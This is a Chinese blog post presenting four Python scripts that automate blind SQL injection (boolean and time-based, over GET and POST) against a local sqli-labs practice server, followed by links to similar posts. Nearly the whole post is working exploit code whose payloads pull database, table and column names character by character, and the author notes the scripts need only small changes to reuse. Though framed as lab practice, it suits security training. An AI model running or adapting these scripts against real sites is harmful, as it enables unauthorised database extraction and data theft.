sql盲注自动化脚本编写

最新推荐文章于 2024-04-07 21:19:30 发布
最新推荐文章于 2024-04-07 21:19:30 发布
阅读量317 收藏 9
点赞数 3
分类专栏: owasp 文章标签: sql 自动化 数据库 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57861415/article/details/129478561
版权

GET型bool注入

import requests
baseurl='http://127.0.0.1/sqli-labs/Less-5/'
db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''
result=''
#根据特定字符进行判断
right=''

sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']

def dblenth(sql_payload):
    global db_lenth
    for j in range(1,100):
        payload="?id=1' and length(({0}))={1}--+".format(sql_payload,j)
        res=requests.get(baseurl+payload)
        # print(len(res.text))
        if len(res.text) ==704:
            db_lenth=j
            print(j)

    return j

def dbname(lenth,sql_payload):
    global db_name,result
    for j in range(1,lenth+1):
        for i in range(32,127):
            url_payload="?id=1' and ascii(substr(({0}),{1},1))={2}--+".format(sql_payload,j,i)
            res=requests.get(baseurl+url_payload)
            #根据字节长度进行判断
            #print(len(res.text))
            if len(res.text)==704:
                #print(chr(i))
                result+=chr(i)
                print(result)
                continue

    return result

#获取数据库名
dblenth(sql_payloads[0])
db_name=dbname(int(db_lenth),sql_payloads[0])
print('数据库名为'+db_name)
#获取表名
table_length=dblenth(sql_payloads[1])
table_name=dbname(int(db_lenth),sql_payloads[1])
print('表名为'+table_name)

#获取列名
columns_length=dblenth(sql_payloads[2])
columns_name=db_name=dbname(int(db_lenth),sql_payloads[2])
print('列名名为'+columns_name)

GET型延时注入

import requests
baseurl='http://127.0.0.1/sqli-labs/Less-6/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']
# result=''
payload=''
db_length=''
db_name=''
table_length=''
table_name=''
columns_length=''
columns_name=''

def get_respone(url):
    try:
        html = requests.get(url, timeout=2)
        return False
    except Exception as e:
        print("......")
        return True
def get_length(sql_payload):
    for j in range(1,100):
        payload='?id=1"and if(length(({0}))={1},sleep(3),2)--+'.format(sql_payload,j)
        if get_respone(baseurl + payload):
            print(j)
            return j



def get_name(length,sql_payload):
    result=''
    for i in range(1,length+1):
        for j in range(32,127):
            payload = '?id=1" and if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)--+'.format(sql_payload,i,j)
            if get_respone(baseurl + payload):
                result+=chr(j)
                print(result)
    return result

#报表
db_length=get_length(sql_payloads[0])
db_name=get_name(int(db_length),sql_payloads[0])
print('数据库名为'+db_name)
#爆单
table_length=get_length(sql_payloads[1])
table_name=get_name(int(table_length),sql_payloads[1])
print('表名为'+table_name)

#爆列
columns_length=get_length(sql_payloads[2])
columns_name=get_name(int(columns_length),sql_payloads[2])
print('列名为'+columns_name)

POST型bool注入

import requests
baseurl='http://127.0.0.1/sqli-labs/Less-15/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']

db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''
def post_length(sql_payload):
    for i in  range(1,100):
        payload="1'or length(({0}))={1}#".format(sql_payload,i)
        data={'uname':payload,'passwd':'1','submit':'Submit'}
        res=requests.post(baseurl,data=data)
        #print(len(res.text))
        # print(res.text)
        if len(res.text)==1492:
            print(i)
            return i



def post_name(sql_payload,length):
    result=''
    for  i in range(1,length+1):
        for j in  range(32,130):
            payload = "1'or ascii(substr(({0}),{1},1))={2}#".format(sql_payload,i,j)
            data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
            res = requests.post(baseurl, data=data)
            if len(res.text)==1492:
                result+=chr(j)
                print(result)
    return result
#爆数据库名
db_lenth=post_length(sql_payloads[0])
db_name=post_name(sql_payloads[0],db_lenth)
print('数据库名为'+db_name)

#爆表名
table_length=post_length(sql_payloads[1])
table_name=post_name(sql_payloads[1],table_length)
print('表名为'+table_name)
#爆列名
columns_length=post_length(sql_payloads[2])
columns_name=post_name(sql_payloads[2],columns_length)
print('列名名为'+columns_name)

POST型延时注入

import requests
baseurl='http://127.0.0.1/sqli-labs/Less-15/'
sql_payloads=['select database()','select group_concat(table_name) from information_schema.tables where table_schema=database()','select group_concat(column_name) from information_schema.columns where table_schema=database()']

db_name = ''
db_lenth=''
table_name=''
table_length=''
columns_name=''
columns_length=''

def post_length(sql_payload):
    def post_respone(url):
        try:
            html = requests.post(url, data=data, timeout=2)
            return False
        except Exception as e:
            print("......")
            return True

    for i in  range(1,100):
        payload="1'or if(length(({0}))={1},sleep(3),2)#".format(sql_payload,i)
        data={'uname':payload,'passwd':'1','submit':'Submit'}
        if post_respone(baseurl):
            print(i)
            return i

def post_name(sql_payload,length):
    def post_respone(url):
        try:
            html = requests.post(url, data=data, timeout=2)
            return False
        except Exception as e:
            print("......")
            return True

    result=''
    for  i in range(1,length+1):
        for j in  range(32,130):
            payload = "1'or if((ascii(substr(({0}),{1},1))={2}),sleep(3),1)#".format(sql_payload,i,j)
            data = {'uname': payload, 'passwd': '1', 'submit': 'Submit'}
            if post_respone(baseurl):
                result+=chr(j)
                print(result)

    return result


# #爆数据库名
db_lenth=post_length(sql_payloads[0])
db_name=post_name(sql_payloads[0],db_lenth)
print(db_name)
#爆表名
table_length=post_length(sql_payloads[1])
table_name=post_name(sql_payloads[1],table_length)
print('表名为'+table_name)
#爆列名
columns_length=post_length(sql_payloads[2])
columns_name=post_name(sql_payloads[2],columns_length)
print('列名名为'+columns_name)

其实写的四个脚本大多其实都是一样的,其实稍微改动一些就可以用了,整体思路都差不多。

glan想睡觉
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
时间盲注python脚本.zip
12-28
python编写时间盲注自动化脚本
Python脚本-时间盲注
m0_74317362的博客
09-23 1022
添加了time.sleep(0.05)
SQL盲注(布尔盲注
最新发布
Dug123456_的博客
04-07 996
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL盲注python脚本自动化注入
菜鸟学安全的博客
12-18 1193
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
SQL盲注脚本
ma963852的博客
12-14 838
#coding:utf-8 import requests import time ip_port="127.0.0.1:80" data={ "login":"bee", "password":"bug", "security_level":"0", "form":"submit" } urlLogin="http://%s/login.php"%ip_port session=requests.session() resp=session.post(urlLogin,.
SQL盲注脚本(MySQL
卧龙居
11-13 1287
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
sql盲注脚本
、moddemod
06-14 996
# moddemod # 2019/6/13 # 8:23 # PyCharm import requests import re """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" class Blind(object...
python编写的sql盲注
10-28
python编写的sql盲注
sql盲注检测的简单脚本.zip
03-10
sql盲注检测的简单脚本.zip
SQL Server镜像自动生成脚本
01-21
镜像的搭建非常繁琐,花了一点时间写了这个脚本,方便大家搭建镜像  执行完这个镜像脚本之后,好在每台机器都绑定一下hosts文件,不然的话,镜像可能会不work  192.168.1.1 WSQL01  192.168.1.2 WSQL02  192...
SQLServer2008自动备份脚本
12-17
利用sqlserver自带的命令行工具sqlcmd实现数据库备份,自动备份只需要自己建立计划任务。自行修改压缩包中的backup.sql
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 842
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 633
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
sqli-labs boolean-based 盲注脚本
lixiangminghate的专栏
06-24 2303
sqli-labs从Less8到Less10是盲注练习:大家在看lcarmy做练习Less5时应该发现他手动输入了含有payload的url。的确,出于演示目的,显得条理很清晰;但是,这样做的重复工作量实在太大了,做完这样的练习至少需要不厌其烦的耐心!我觉得,做这类练习的人,或多或少写过代码,所以肯定会想到用脚本之类的工具代替重复工作。在此,提供一份脚本,实现以上目的。...
python脚本实现sql时间盲注
wrypot的博客
03-27 696
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
sqli盲注自用脚本
weixin_30706507的博客
01-27 530
盲注脚本 # -*- coding:utf-8 -*- import requests import re url = "http://123.206.87.240:8002/chengjidan/index.php" #if(prep1,prep2,prep3) 若表达式prep1为真,则返回prep2,若prep1为假,则返回prep3 base_payload = "...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值